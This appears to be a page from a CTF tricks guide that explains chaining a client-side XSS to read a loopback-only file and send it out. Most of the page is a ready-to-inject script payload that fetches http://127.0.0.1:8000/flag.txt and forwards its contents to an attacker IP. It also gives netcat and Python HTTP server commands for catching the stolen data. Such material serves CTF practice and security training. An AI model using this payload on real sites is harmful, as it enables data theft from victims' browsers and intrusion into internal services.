> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/xss/trick-0397/web-xss-client-side-chained.md).

# Client Side Chained

## XSS Chained Local File Read and Exfiltration

Using a client-side XSS vulnerability, you can execute JavaScript in the victim's browser to read data from a resource accessible via the loopback interface (`127.0.0.1`) and then exfiltrate that data to your own server.

The technique involves chaining two `fetch` requests. The first `fetch` targets the local resource (e.g., `http://127.0.0.1:8000/flag.txt`), reads its content as text, and then initiates a second `fetch` request to send this content (URL-encoded) to your specified IP address and port.

Inject the following payload, adapting the localhost path/port and your attacker IP/port as needed:

```javascript
'"><script>fetch('http://127.0.0.1:8000/flag.txt').then(response => response.text()).then(data => { fetch('http://<YOUR-IP-ADDRESS-tun0>:8000/?flag=' + encodeURIComponent(data)); });</script>
```

To receive the data sent by the victim's browser, you need to have a listener running on your machine. This listener will capture the incoming HTTP GET request containing the exfiltrated data in the URL parameter.

Common tools for setting up a simple listener include `netcat` or Python's built-in HTTP server.

Using `netcat`, you can listen on a specific port with a command like:

```bash
nc -lvnp <port>
```

Alternatively, you can use a simple Python HTTP server. For Python 2, the command is:

```bash
python -m SimpleHTTPServer <port>
```

For Python 3, use:

```bash
python3 -m http.server <port>
```

Ensure you replace `<port>` with the port number specified in your `fetch` exfiltration payload (e.g., `8000`). The listener will display the incoming request, allowing you to retrieve the exfiltrated data from the URL path.
